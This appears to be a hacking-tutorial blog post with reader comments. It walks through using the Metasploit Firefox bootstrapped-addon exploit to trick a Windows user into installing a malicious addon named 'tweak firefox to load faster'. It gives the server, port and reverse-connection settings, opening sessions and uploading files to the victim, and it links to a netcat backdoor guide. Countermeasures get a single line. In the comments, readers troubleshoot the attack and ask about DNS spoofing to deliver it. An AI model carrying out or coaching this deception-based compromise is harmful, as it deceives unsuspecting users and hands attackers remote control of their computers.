• 26,952
  • +1,026
  • 3,065
Hacking Windows using Mozilla Firefox Addon Social Engineering

Hacking Windows using Mozilla Firefox Addon Social Engineering

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5R1

Victim O.S : Windows XP SP3

Vulnerable Application : none (the people are vulnerable in this case)

Exploit Credits : mihi < >

After long time with busy days finally I can wrote another tutorial about Windows Hacking. Today the tutorial was about "Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution".

According to metasploit.com about this vulnerability :

This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

This hacking method actually targeted users who didn't know and not aware about security issue while they installing some addons into their browsers.

Requirements :

1. firefox_xpi_bootstrapped_addon.rb

Step By Step :

1. Prepare the attack from your metasploit console(view picture below)

Hacking Windows using Mozilla Firefox Addon Social Engineering

Information :

use the firefox xpi bootstrapped addon exploit

and then set the payload (if you don't know which payload, you can use show payloads command)

2. The next step you can view the available options by using show options command, but I've already set up the necessary switch as you can see in picture below:

Hacking Windows using Mozilla Firefox Addon Social Engineering

Information :

set addonname tweak firefox to load faster --> eye catching name for social engineering purpose

set srvhost 192.168.8.93 --> your server ip address run the exploit

set srvport 80 --> server port to serve malicious website

set uripath firefox-tweaker --> make the URL more friendly like http://192.168.8.93/firefox-tweaker

set lhost 192.168.8.93  --> local ip address to receive connection from victim

set lport 443 --> which port use to handle connection from victim

set target 0 --> Set the default target for this exploit(firefox)

3. If everything have been set up correctly, you can run exploit commend to run the exploit server to server malicious page.

Hacking Windows using Mozilla Firefox Addon Social Engineering

4. While user access the page http://192.168.8.93/firefox-tweaker :

Hacking Windows using Mozilla Firefox Addon Social Engineering

and then they click "Install Now". . .

Hacking Windows using Mozilla Firefox Addon Social Engineering

5. Our metasploit console will got something interesting over there…

Hacking Windows using Mozilla Firefox Addon Social Engineering

By using sessions -l command we can listing the active sessions created.

6. We need to interract with the session by using sessions -i id_active_sessions and get access to victim system and upload some file there ๐Ÿ˜›

Hacking Windows using Mozilla Firefox Addon Social Engineering

here's on victim file explorer after I've finished upload some file :

Hacking Windows using Mozilla Firefox Addon Social Engineering

7. After that, maybe you can view my other tutorial about set up backdoor here http://www.hacking-tutorial.com/computer/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/

Countermeasures :

1. Make sure you install addons from developer you trust; or at least you know about the background history by googling it first.

Hope you found it useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • t

    Its truly annoying to have to look at images with watermarks that blur the information depicted in them. for this reason I am out. Good information but annoying water marks 

    • v4L

      #t
      LoL…that’s okay ๐Ÿ™‚ btw..this blog was dedicated for tutorial..so you learn by doing, not for you saw the pics(it’s only help your step to learn) ๐Ÿ˜›
      if you need the pics without watermarks, you can contact me with your real e-mail and we can make some deal for you to copy it…

  • PRASANTH

    Thanks for the tutorial. My doubt is if the victim has other than xp-3 then how can we use this add-on

    • v4L

      #PRASANTH
      I haven’t try for other os earlier than XP, but you can try…the step was the same.

  • rere

    god job bro…
    bro this exploitd work to windows 7??

    • v4L

      #rere
      I haven’t try it…maybe you can test it in your lab ๐Ÿ™‚

  • S

    Can you DNS spoof this? If so how can I? I know how to dns spoof but when I put the web address in it just says invaild?

    • v4L

      #S
      I’m not doing it thanks ๐Ÿ™‚
      but I can answer your question about how to check whether DNS spoof work/not.
      you can change your DNS server to the one you already successfully spoofed (you can make your own lab on your LAN network) and check it’s redirected or not.
      maybe later I’LL post some other tutorial about it

  • sumit

    when i exploit and an exception saying Exploit exception: The address is already in use ipaddress:portnumber(here i m not specifying mine).

    hope i will get reply soon on this.
    thanx ๐Ÿ™‚

    • v4L

      #sumit
      maybe you’ve already run an exploit server before, or if you use the exploit on port 80, maybe your apache service was started. stop it using /etc/init.d/apache stop

  • sumit

    hii there ๐Ÿ™‚
    i m having problem with SET mean i m not able to find it in backtrack5.when i try to upgrade i found this:

    Setting up se-toolkit (3.6-bt0) …
    svn: OPTIONS of ‘http://svn.secmaniac.com/social_engineering_toolkit’: Could not resolve hostname `svn.secmaniac.com’: Host not found (http://svn.secmaniac.com)
    dpkg: error processing se-toolkit (–configure):
    subprocess installed post-installation script returned error exit status 1
    Setting up w3af (1.2-bt1) …
    tar: pybloomfiltermmap-0.2.0.tar.gz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Exiting with failure status due to previous errors
    /var/lib/dpkg/info/w3af.postinst: line 4: cd: pybloomfiltermmap-0.2.0: No such file or directory
    python: can’t open file ‘setup.py’: [Errno 2] No such file or directory
    svn: OPTIONS of ‘https://w3af.svn.sourceforge.net/svnroot/w3af/trunk’: Could not resolve hostname `w3af.svn.sourceforge.net’: Host not found (https://w3af.svn.sourceforge.net)
    dpkg: error processing w3af (–configure):
    subprocess installed post-installation script returned error exit status 1
    Errors were encountered while processing:
    se-toolkit
    w3af
    E: Sub-process /usr/bin/dpkg returned an error code (1)

    please help me out.

    • v4L

      #sumit
      how about your internet connection? it seems like your DNS server can’t resolve the domain name.
      if you’re using shared internet connection, maybe you can give a try to update it not in a peak time(e.g 12:00am when people already sleep ๐Ÿ™‚ ).

  • sumit

    svn: OPTIONS of 'http://svn.secmaniac.com/social_engineering_toolkit': Could not resolve hostname `svn.secmaniac.com': Host not found (http://svn.secmaniac.com)
     error is showing while updating. Please reply on it
     

    • v4L

      #sumit
      do you connected to internet?

  • sumit

    sorry for disturb you. i got my problem solved now :). Thank you.

  • sathish

    i getting error on “firefox….for user click to ‘accept’..”..then i’m not getting any response?…wat is the problem…then i will use on Back track OS only..In windows OS “local host:80/” is not loading….Now, what can i do?..let me please..

    • v4L

      #sathish
      Did it install the addons or not?sorry I didn’t get your question clear enough

      • sathish

        add-on install successfully…but, i don’t any response appear on the terminal(msfconsole) window…

        And localhost is work on the back track Mozilla browser itself..it cannot load in windows Mozilla browser…

        • v4L

          #sathish
          can I know which version you use in victim?or you can try to downgrade it in http://oldapps.com

  • varun

    i hacked into my own pc (not sure of what exploit i used but i am sure that it is a remote exploit).i used armitage in backtrack 5 R2.sessions were created but i could not interact with the created sessions.

    • v4L

      #varun
      there are many type of exploit and payload. When you get a session, but you can’t interact maybe it’s because you set the payload incorrectly.

  • broo

    root@bt:~# apt-get upgrade
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    The following packages have been kept back:
    smartphone-pentest-framework
    0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
    1 not fully installed or removed.
    After this operation, 0B of additional disk space will be used.
    Do you want to continue [Y/n]? y
    Setting up se-toolkit (4.2.1-bt0) …
    svn: Server sent unexpected return value (504 Gateway Time-out) in response to OPTIONS request for ‘http://svn.trustedsec.com/social_engineering_toolkit’
    dpkg: error processing se-toolkit (–configure):
    subprocess installed post-installation script returned error exit status 1
    Errors were encountered while processing:
    se-toolkit
    E: Sub-process /usr/bin/dpkg returned an error code (1)

    Can someone help to resolv it?

  • Kelkut

    Hi, i have a virtual machine that acts as a victim with win 7 pro x64. I tried the tutorial but i have some problems. First of all, i can’t use meterpreter payload, it isn’t compatible with the exploit. I can use it if i set target to 1 (native payloads) but doing this my firefox browser crash every time that i try to launch the exploit.
    I tried to use the other payloads as “firefox/shell_revers_tcp” but with this type of payload i can’t copy files as i did with meterpeter reverse tcp. There is a way to use the meterpeter shell? Is it a problem given by my os version?
    Thanks